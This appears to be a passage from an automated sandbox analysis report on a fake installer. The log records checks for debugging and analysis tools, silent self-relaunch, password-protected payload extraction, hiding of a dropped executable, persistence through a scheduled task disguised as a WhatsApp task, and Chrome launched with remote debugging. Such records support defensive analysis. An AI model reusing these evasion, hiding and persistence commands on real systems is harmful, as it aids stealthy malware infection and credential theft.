Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="systeminformer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="filemon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="tcpview.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="processhacker.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxserver.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cain.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wsbroker.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x32dbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="shade.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="xenservice.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="lordpe.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="proc_analyzer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="bitbox.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autoruns.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="apimonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="regmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ollydbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x64dbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="hookexplorer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="dumpcap.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="fiddler.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="windbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ida.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procexp.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpanalyzerstdv7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wireshark.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netstat.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="docker.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpdebuggerui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="firejail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="comodosandbox.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysanalyzer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cuckoo.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="immunitydebugger.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxcontrol.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="appguarddesktop.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="petools.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="importrec.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autorunsc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysinspector.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sniff_hit.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cheatengine-x86_64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="frida-helper-64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="gdb.exe"

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

File read: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$204BA,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$304AE,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-GTB58.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5208 /prefetch:8
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$204BA,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process created: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$304AE,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-GTB58.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5208 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wldp.dll	Jump to behavior
